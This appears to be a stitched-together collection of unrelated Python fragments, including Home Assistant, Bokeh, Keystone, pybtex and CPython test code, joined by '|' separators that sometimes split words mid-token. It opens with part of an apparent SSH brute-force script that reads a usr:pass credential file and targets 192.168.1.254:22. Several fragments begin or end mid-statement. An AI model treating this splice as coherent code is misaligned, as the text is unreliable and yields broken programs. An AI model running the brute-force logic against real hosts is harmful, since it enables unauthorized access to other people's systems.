if not(results.brute=="none"): # file-192.168.1.254:22 # file example : usr:pass format!!
cmd=results.brute ### Parsing strings to avoid errors
file=cmd.split("-")[0]
ip=cmd.split("-")[1]
ipparsed=ip.split(":")
ip=ipparsed[0].split()[0]
port=int(ipparsed[1].split()[0]) #remove spaces and then int
f=open(file,"r")
print "Start bruteforcing |
#!/usr/bin/env python3
# Copyright (c) 2020 VMware Inc. All Rights Reserved.
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import itertools
import string
infile = '../../../../ontime_private/short.schema'
states = [ "AK", "AL", "AR", "AZ", "CA", "CO", "CT", "DE", "FL", "GA", "HI", "IA", "ID", "IL", "IN", "KS",
"KY", "LA", "MA", "MD", "ME", "MI", "MN", "MO", "MS", "MT", "NC", "ND", "NE", "NH", "NJ", "NM",
"NV", "NY", "OH", "OK", "OR", "PA", "PR", "RI", "SC", "SD", "TN", "TT", "TX", "UT", "VA", "VT",
"WA", "WI", "WV", "WY" ]
carriers = ["9E", "AA", "AS", "B6", "CO", "DH", "DL", "EV", "F9", "FL", "G4", "GA", "HP", "KH", "MQ", "NK",
"NW", "OH", "OO", "TW", "TZ", "UA", "US", "VX", "WN", "XE", "YV", "YX"]
def get_metadata(cn):
if cn == "DayOfWeek":
(g, gMin, gMax) = (1, 1, 7)
elif cn == "DepTime" or cn == "ArrTime":
(g, gMin, gMax) = (5, 0, 2400)
elif cn == "DepDelay" or cn == "ArrDelay":
(g, gMin, gMax) = (1, -100, 1000)
elif cn == "Cancelled":
(g, gMin, gMax) = (1, 0, 1)
elif cn == "ActualElapsedTime":
(g, gMin, gMax) = (1, 15, 800)
elif cn == "Distance":
(g, gMin, gMax) = (10, 0, 5100)
elif cn == "FlightDate":
# cluster values: (86400000, 852076800000, 1561852800000)
# 2017 values: (86400000, 1483286400000, 1514736000000)
# 2016 values, 2 months: (86400000, 1451635200000, 1456732800000)
(g, gMin, gMax) = (86400000, 1451635200000, 1456732800000)
else:
raise Exception("Unexpected column " + cn)
return {'type': "DoubleColumnQuantization",
| 'granularity': g,
'globalMin': gMin,
'globalMax': gMax}
def get_string_metadata(col):
letters | = list(string.ascii_uppercase)
if col == "OriginState" or col == "DestState":
letters = states
elif col == "UniqueCarrier":
letters = carriers
return {'type': "StringColumnQuantization",
'globalMax': 'a',
'leftBoundaries': letters }
def main():
colnames = []
with open(infile, 'r') as f:
contents = "".join(line for line in f)
schema = json.loads(contents)
colnames = map(lambda s: s["name"], schema)
length2 = itertools.combinations(colnames, 2)
length2 = [sorted(x) for x in length2]
with open('privacy_metadata.json', 'w') as f:
quantization = {}
defaultEpsilons = { "0": 1, "1": 1, "2": .1 }
for col in schema:
cn = col["name"]
if col["kind"] == "String":
quantization[cn] = get_string_metadata(cn)
else:
quantization[cn] = get_metadata(cn)
output = {'epsilons': {}, 'defaultEpsilons': defaultEpsilons, 'quantization': { 'quantization': quantization } }
f.write(json.dumps(output))
if __name__=='__main__':
main()
|
from apps.plus_permissions.default_agents import get_admin_user
from apps.plus_permissions.models import GenericReference
def patch():
for ref in GenericRefer | ence.objects.filter(creator=None):
ref.creator = get_admin_user()
| ref.save()
patch()
|
"""Websocekt API handlers for the hassio integration."""
import logging
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api.connection import ActiveConnection
from homeassistant.core import HomeAssistant, callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.dispatcher import (
async_dis | patcher_connect,
async_dispatcher_send,
)
from .const import (
ATTR_DATA,
ATTR_ENDPOINT,
ATTR_METHOD,
ATTR_RESULT,
ATTR_TIMEOUT,
ATTR_WS_EVENT,
DOMAIN,
EVENT_SUPERVISOR_EVENT,
WS_ID,
WS_TYPE,
WS_TYPE_API,
WS_TYPE_EVENT,
WS_TYPE_SUBSCRIBE,
)
from .handler import HassIO
SCHEMA_WEBSOCKET_EVENT = vol.Schema(
{vol.Required(ATTR_WS_EVENT): cv.string},
extr | a=vol.ALLOW_EXTRA,
)
_LOGGER: logging.Logger = logging.getLogger(__package__)
@callback
def async_load_websocket_api(hass: HomeAssistant):
"""Set up the websocket API."""
websocket_api.async_register_command(hass, websocket_supervisor_event)
websocket_api.async_register_command(hass, websocket_supervisor_api)
websocket_api.async_register_command(hass, websocket_subscribe)
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command({vol.Required(WS_TYPE): WS_TYPE_SUBSCRIBE})
async def websocket_subscribe(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Subscribe to supervisor events."""
@callback
def forward_messages(data):
"""Forward events to websocket."""
connection.send_message(websocket_api.event_message(msg[WS_ID], data))
connection.subscriptions[msg[WS_ID]] = async_dispatcher_connect(
hass, EVENT_SUPERVISOR_EVENT, forward_messages
)
connection.send_message(websocket_api.result_message(msg[WS_ID]))
@websocket_api.async_response
@websocket_api.websocket_command(
{
vol.Required(WS_TYPE): WS_TYPE_EVENT,
vol.Required(ATTR_DATA): SCHEMA_WEBSOCKET_EVENT,
}
)
async def websocket_supervisor_event(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Publish events from the Supervisor."""
async_dispatcher_send(hass, EVENT_SUPERVISOR_EVENT, msg[ATTR_DATA])
connection.send_result(msg[WS_ID])
@websocket_api.require_admin
@websocket_api.async_response
@websocket_api.websocket_command(
{
vol.Required(WS_TYPE): WS_TYPE_API,
vol.Required(ATTR_ENDPOINT): cv.string,
vol.Required(ATTR_METHOD): cv.string,
vol.Optional(ATTR_DATA): dict,
vol.Optional(ATTR_TIMEOUT): vol.Any(cv.Number, None),
}
)
async def websocket_supervisor_api(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
):
"""Websocket handler to call Supervisor API."""
supervisor: HassIO = hass.data[DOMAIN]
try:
result = await supervisor.send_command(
msg[ATTR_ENDPOINT],
method=msg[ATTR_METHOD],
timeout=msg.get(ATTR_TIMEOUT, 10),
payload=msg.get(ATTR_DATA, {}),
)
if result.get(ATTR_RESULT) == "error":
raise hass.components.hassio.HassioAPIError(result.get("message"))
except hass.components.hassio.HassioAPIError as err:
_LOGGER.error("Failed to to call %s - %s", msg[ATTR_ENDPOINT], err)
connection.send_error(
msg[WS_ID], code=websocket_api.ERR_UNKNOWN_ERROR, message=str(err)
)
else:
connection.send_result(msg[WS_ID], result.get(ATTR_DATA, {}))
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2022, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
from __future__ import annotations # isort:skip
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Bokeh imports
from bokeh.core.serialization import Buffer
from bokeh.core.types import ID
from bokeh.protocol | import Protocol
from bokeh.protocol.exceptions impor | t ValidationError
# Module under test
from bokeh.protocol import receiver # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
proto = Protocol()
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_creation() -> None:
receiver.Receiver(None)
async def test_validation_success() -> None:
msg = proto.create('ACK')
r = receiver.Receiver(proto)
partial = await r.consume(msg.header_json)
assert partial is None
partial = await r.consume(msg.metadata_json)
assert partial is None
partial = await r.consume(msg.content_json)
assert partial is not None
assert partial.msgtype == msg.msgtype
assert partial.header == msg.header
assert partial.content == msg.content
assert partial.metadata == msg.metadata
async def test_validation_success_with_one_buffer() -> None:
r = receiver.Receiver(proto)
partial = await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
assert partial is None
partial = await r.consume('{}')
assert partial is None
partial = await r.consume('{"bar": 10}')
assert partial is None
partial = await r.consume('{"id": "buf_header"}')
assert partial is None
partial = await r.consume(b'payload')
assert partial is not None
assert partial.msgtype == "PATCH-DOC"
assert partial.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}
assert partial.content == {"bar":10}
assert partial.metadata == {}
assert partial.buffers == [Buffer(ID("buf_header"), b"payload")]
async def test_multiple_validation_success_with_multiple_buffers() -> None:
r = receiver.Receiver(proto)
for N in range(10):
partial = await r.consume(f'{{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":{N}}}')
partial = await r.consume('{}')
partial = await r.consume('{"bar": 10}')
for i in range(N):
partial = await r.consume(f'{{"id": "header{i}"}}')
partial = await r.consume(f'payload{i}'.encode())
assert partial is not None
assert partial.msgtype == "PATCH-DOC"
assert partial.header == {"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers": N}
assert partial.content == {"bar":10}
assert partial.metadata == {}
for i in range(N):
assert partial.buffers[i] == Buffer(ID(f"header{i}"), f"payload{i}".encode())
async def test_binary_header_raises_error() -> None:
r = receiver.Receiver(proto)
with pytest.raises(ValidationError):
await r.consume(b'{"msgtype": "PATCH-DOC", "msgid": "10"}')
async def test_binary_metadata_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
with pytest.raises(ValidationError):
await r.consume(b'metadata')
async def test_binary_content_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10"}')
await r.consume('metadata')
with pytest.raises(ValidationError):
await r.consume(b'content')
async def test_binary_payload_header_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
await r.consume('{}')
await r.consume('{}')
with pytest.raises(ValidationError):
await r.consume(b'{"id": "buf_header"}')
async def test_text_payload_buffer_raises_error() -> None:
r = receiver.Receiver(proto)
await r.consume('{"msgtype": "PATCH-DOC", "msgid": "10", "num_buffers":1}')
await r.consume('{}')
await r.consume('{}')
await r.consume('{"id": "buf_header"}')
with pytest.raises(ValidationError):
await r.consume('buf_payload')
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
|
# Copyright 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/li | censes/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# L | icense for the specific language governing permissions and limitations
# under the License.
"""Keystone UUID Token Provider"""
from __future__ import absolute_import
import uuid
from keystone.token.providers import common
class Provider(common.BaseProvider):
def __init__(self, *args, **kwargs):
super(Provider, self).__init__(*args, **kwargs)
def _get_token_id(self, token_data):
return uuid.uuid4().hex
|
# Copyright (c) 2008, 2009, 2010, 2011 Andrey Golovizin
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from xml.sax.saxutils import escape
from pybtex.backends import BaseBackend
import pybtex.io
file_extension = 'html'
PROLOGUE = u"""<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
<html>
<head><meta name="generator" content="Pybtex">
<meta http-equiv="Content-Type" content="text/html; charset=%s">
<title>Bibliography</title>
</head>
<body>
<dl>
"""
class Backend(BaseBackend):
name = 'html'
suffixes = '.html',
symbols = {
'ndash': u'–',
'newblock': u'\n',
'nbsp': u' '
}
tags = {
'emph': u'em',
}
def format_text(self, text):
return escape(text)
def format_tag(self, tag_name, text):
tag = self.tags[tag_name]
return ur'<%s>%s</%s>' % (tag, text, tag)
def write_prologue(self, maxlen):
encoding = self.encoding or pybtex.io.get_default_encoding()
self. | output(PROLOGUE % encoding)
def write_epilogue(sel | f):
self.output(u'</dl></body></html>\n')
def write_entry(self, key, label, text):
self.output(u'<dt>%s</dt>\n' % label)
self.output(u'<dd>%s</dd>\n' % text)
|
# -*- coding: utf-8 -*-
from __future__ import (print_function, unicode_literals, absolute_import,
division)
import json
import re
import six
import sys
channel_name_re = re.compile('\A[-a-zA-Z0-9_=@,.;]+\Z')
app_id_re = re.compile('\A[0-9]+\Z')
pusher_url_re = re.compile('\A(http|https)://(.*):(.*)@(.*)/apps/([0-9]+)\Z')
socket_id_re = re. | compile('\A\d+\.\d+\Z')
if sys.version_info < (3,):
text = 'a unicode string'
else:
text = 'a string'
def ensure_text(obj, name):
if isinstance(obj, six.text_type):
return obj
if isinstance(obj, six.string_types):
return six.text_type(obj)
raise TypeError("%s should be %s" % (name, text))
def validate_channel(channel):
channel = ensure_text(channel, "channel")
if len(channel) > 200:
raise ValueError("Channel too long: %s" % channel)
| if not channel_name_re.match(channel):
raise ValueError("Invalid Channel: %s" % channel)
return channel
def validate_socket_id(socket_id):
socket_id = ensure_text(socket_id, "socket_id")
if not socket_id_re.match(socket_id):
raise ValueError("Invalid socket ID: %s" % socket_id)
return socket_id
|
ssertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading, _thread
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(_thread.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = _thread.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
| self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self. | assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 5)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug", "division_warning",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = |
#!/usr/bin/python
impor | t json
with open("test_json.json" | ,"r") as f:
new_list = json.load(f)
print new_list
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from djang | o.db import migrations, models
import datetime
class Migration(migrations.Migration):
dependencies = [
('ccx', '0008_auto_20170523_0630'),
]
operations = [
migrations.AlterField(
model_name='customcourseforedx',
name='delivery_mode',
field=models.CharField(default=b'IN_PERSON', max_length=255, choices=[(b'IN_PERS | ON', b'In Person'), (b'ONLINE_ONLY', b'Online')]),
),
migrations.AlterField(
model_name='customcourseforedx',
name='time',
field=models.DateTimeField(default=datetime.datetime(2017, 6, 8, 5, 24, 53, 908103)),
),
]
|
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import threading
class TimeoutError(Exception):
pass
class Datasrc(object):
def __init__(self, length=0):
self.length = length
self.cursor = -1
self.datums = {}
self.history = []
self.sortedkeys = []
self.cond = threading.Condition()
self.newdata = threading.Event()
def __getitem__(self, key):
with self.cond:
return self.datums[key]
def __setitem__(self, key, value):
self.push(key, value)
def __contains__(self, key):
with self.cond:
return key in self.datums
def has_key(self, key):
with self.cond:
return key in self.datums
def __delitem__(self, key):
self.remove(key)
def __len__(self):
with self.cond:
return len(self.history)
def push(self, key, value):
with self.cond:
if key in self.history:
self.history.remove(key)
self.history.append(key)
self.datums[key] = value
self._eject_old()
self.newdata.set()
self.cond.notify()
def pop_one(self):
return self.remove(self.history[0])
def pop(self, *args):
if len(args) == 0:
return self.remove(self.history[0])
assert len(args) == 1, \
ValueError("Too many parameters to po | p()")
return self.remove(args[0])
def remove(self, key):
with self.cond:
val = self.datums[key]
| self.history.remove(key)
del self.datums[key]
self.sortedkeys = list(self.datums.keys())
self.sortedkeys.sort()
return val
def _eject_old(self):
if (self.length is None) or (self.length <= 0):
# no limit
return
while len(self.history) > self.length:
oldest = self.history.pop(0)
del self.datums[oldest]
self.sortedkeys = list(self.datums.keys())
self.sortedkeys.sort()
def index(self, key):
with self.cond:
return self.history.index(key)
def index2key(self, index):
with self.cond:
return self.history[index]
def index2value(self, index):
with self.cond:
return self.datums[self.history[index]]
def youngest(self):
return self.datums[self.history[-1]]
def oldest(self):
return self.datums[self.history[0]]
def pop_oldest(self):
return self.pop(self.history[0])
def pop_youngest(self):
return self.pop(self.history[-1])
def keys(self, sort='alpha'):
with self.cond:
if sort == 'alpha':
return self.sortedkeys
elif sort == 'time':
return self.history
else:
return self.datums.keys()
def wait(self, timeout=None):
with self.cond:
self.cond.wait(timeout=timeout)
if not self.newdata.isSet():
raise TimeoutError("Timed out waiting for datum")
self.newdata.clear()
return self.history[-1]
def get_bufsize(self):
with self.cond:
return self.length
def set_bufsize(self, length):
with self.cond:
self.length = length
self._eject_old()
#END
|
""" ./examples/attachment/attachment_step.rst """
from hamcrest import assert_that
from allure_commons_test.report import has_test_case
from allure_commons_test.result import has_step
from allure_ | comm | ons_test.result import has_attachment
def test_step_with_attachment(executed_docstring_path):
assert_that(executed_docstring_path.allure_report,
has_test_case("test_step_with_attachment",
has_step("step_with_attachment",
has_attachment()
),
)
)
|
self.scale*nanmask+self.continuum-self.baseline.basespec
self.spectrumplot = axis.plot(self.vind,self.spectrum+self.offset,color=self.plotcolor,
linestyle='steps-mid',linewidth=linewidth,
**kwargs)
else:
self.spectrum = self.cube*self.scale+self.continuum-self.baseline.basespec
self.spectrumplot = axis.plot(self.vind,self.spectrum+self.offset,color=self.plotcolor,
linestyle='steps-mid',linewidth=linewidth,
**kwargs)
if self.errspec is not None:
if errstyle == 'fill':
self.errorplot = [axis.fill_between(steppify(self.vind,isX=True,sign=sign(self.dv)),
steppify(self.spectrum+self.offset-self.errspec*self.scale),
steppify(self.spectrum+self.offset+self.errspec*self.scale),
facecolor=self.plotcolor, alpha=self.erralpha, **kwargs)]
elif errstyle == 'bars':
self.errorplot = axis.errorbar(self.vind, self.spectrum+self.offset,
yerr=self.errspec*self.scale, ecolor=self.plotcolor, fmt=None,
**kwargs)
if vmin is not None: xlo = self.vmin
else: xlo=self.vind.min()
if vmax is not None: xhi = self.vmax
else: xhi=self.vind.max()
axis.set_xlim(xlo,xhi)
if self.title is not None:
axis.set_title(self.title)
elif self.xtora and self.ytodec:
axis.set_title("Spectrum at %s %s" %
(ratos(self.xtora(i)),dectos(self.ytodec(j))))
elif self.specname:
axis.set_title("Spectrum of %s" % self.specname)
if isinstance(self.xunits,str):
axis.set_xlabel(self.xunits)
else:
axis.set_xlabel("V$_{LSR}$ (km s$^{-1}$)")
self.xunits = 'km/s'
if units in ['Ta*','Tastar','K']:
axis.set_ylabel("$T_A^*$ (K)")
elif units == 'mJy':
axis.set_ylabel("$S_\\nu$ (mJy)")
elif units == 'Jy':
axis.set_ylabel("$S_\\nu$ (Jy)")
else:
axis.set_ylabel(self.units)
if self.autorefresh: self.refresh()
def save(self,fname,**kwargs):
"""
Save the current spectrum (useful for saving baselined data)
"""
newfile = pyfits.PrimaryHDU(data=self.cube,header=self.header)
newfile.writeto(fname,**kwargs)
def savefig(self,fname,bbox_inches='tight',**kwargs):
"""
simple wrapper of maplotlib's savefig.
"""
self.axis.figure.savefig(fname,bbox_inches=bbox_inches,**kwargs)
def showlines(self,linefreqs,linenames,ctype='freq',cunit='hz',yscale=0.8,vofflines=0.0,
voffunit='km/s',**kwargs):
"""
Overplot vertical lines and labels at the frequencies (or velocities) of each line
yscale - fraction of maximum at which to label
"""
self.clearlines()
if ctype != 'freq':
print "Sorry, non-frequency units not implemented yet."
return
speedoflight=2.99792458e5
if self.reffreq and self.xunits in ('km/s','m/s'):
linefreqs = -(array(linefreqs)-self.reffreq)/self.reffreq * speedoflight
if 'hz' in cunit or 'Hz' in cunit:
linefreqs *= (1.0 + vofflines / speedoflight)
else:
linefreqs += vofflines
ymax = (self.spectrum[self.spectrum==self.spectrum]).max()
for lf,ln in zip(linefreqs,linenames):
if lf < self.vind.max() and lf > self.vind.min():
self.linecollections.append(vlines(lf,0,ymax,**kwargs))
self.texts.append(text(lf,ymax*yscale,ln,rotation='vertical',**kwargs))
if self.autorefresh: self.refresh()
def clearlines(self):
if len(self.texts) > 0:
for T in self.texts:
if T in self.axis.texts:
self.axis.texts.remove(T)
if len(self.linecollections) > 0:
for LC in self.linecollections:
if LC in self.axis.collections:
self.axis.collections.remove(LC)
def refresh(self):
self.axis.figure.canvas.draw()
class FFT:
def __init__(self,specplotter,fignum=3,axis=None, color='k'):
self.specplotter=specplotter
if axis is None:
self.fignum=fignum
self.figure=figure(self.fignum)
self.axis=gca()
else:
self.axis=axis
self.figure=self.axis.figure
self.fignum=None
#self.axis.clear()
self.color=color
self.fftplot=None
self.setspec()
self.setshift()
self.clear()
def __call__(self,psd=False,shift=True):
self.setspec()
if psd:
self.psd(shift=shift)
else:
self.fft(shift=shift)
def fft(self,shift=True,logplot=False,**kwargs):
self.clear()
self.setshift(shift)
if logplot: self.axis.set_yscale('log')
else: self.axis.set_yscale('linear')
self.fftspec = fft(self.spectofft)
self.realfft = self.fftspec.real
self.imagfft = self.fftspec.imag
self.fftplot = self.axis.plot(self.shiftfunc(self.realfft),
drawstyle='steps-mid',color=self.color,**kwargs)
self.refresh()
def psd(self,logplot=True,shift=True,**kwargs):
self.clear()
if logplot: self.axis.set_yscale('log')
else: self.axis.set_yscale('linear')
self.setshift(shift)
self.psdspec = fft(self.spectofft) * fft(self.spectofft[::-1])
self.psdreal = abs(self.psdspec)
self.fftplot = self.axis.plot(self.shiftfunc(self.psdreal),
drawstyle='steps-mid',color=self.color,**kwargs)
if logplot: self.axis.set_yscale('log')
else: self.axis.set_yscale('linear')
self.refresh()
def setshift(self,shift=True):
if shift: self.shiftfunc = fftshift
else: self.shiftfunc = lambda x: x
def setspec(self):
self.spectofft = copy(self.specplotter.spectrum)
OKmask = (self.spectofft==self.spectofft)
self.spectofft[(True-OKmask)] = 0
def clear(self):
if self.fftplot is not None:
for p in self.fftplot:
p.set_visible(False)
if p in self.axis.lines: self.axis.lines.remove(p)
self.axis.clear()
self.refresh()
def refresh(self):
self.axis.figure.canvas.draw()
class PSD(FFT):
def __call__(self,shift=True):
self.setspec()
self.setshift(shift)
self.clear()
self.psd()
self.refresh()
class Baseline:
def __init__(self,specplott | er):
self.baselinepars = None
self.order = None
self.basespec = zeros(specplotter.spectrum.shape[0])
self.excludemask = zeros(specp | lotter.spectrum.shape[0],dtype='bool')
self.OKmask = ones(specplotter.spectrum.shape[0],dtype='bool')
self.specplotter = specplotter
self.blleg = None
self.click = 0
self.nclicks_b1 = 0
self.nclicks_b2 = 0
self.fitregion=[]
self.excludevelo = []
self.excludepix = []
def __call__(self, order=1, annotate=False, excludefit=False, save=True,
exclude=None, exclusionlevel=0.01,
interactive=False, **kwargs):
"""
Fit and remove a polynomial from the spectrum.
It will be saved in the variable "self.basespec"
and the fit parameters will be saved in "self.order"
function baseline(spectrum,xarr=None,xmin=None,xmax=None,order=1,quiet=True,exclude=None):
Subtract a baseline from a spectrum
If xmin,xmax are not specified, defaults to ignoring first and last 10% of spectrum
exclude is a set of start/end indices to ignore when baseline fitting
(ignored by setting error to infinite in fitting procedure)
excludefit creates a mask based on the fitted gaussian model (assuming
that it has a zero-height) using an exclusion level of (exclusi |
#
# Loxodo -- Password Safe V3 compatible Password Vault
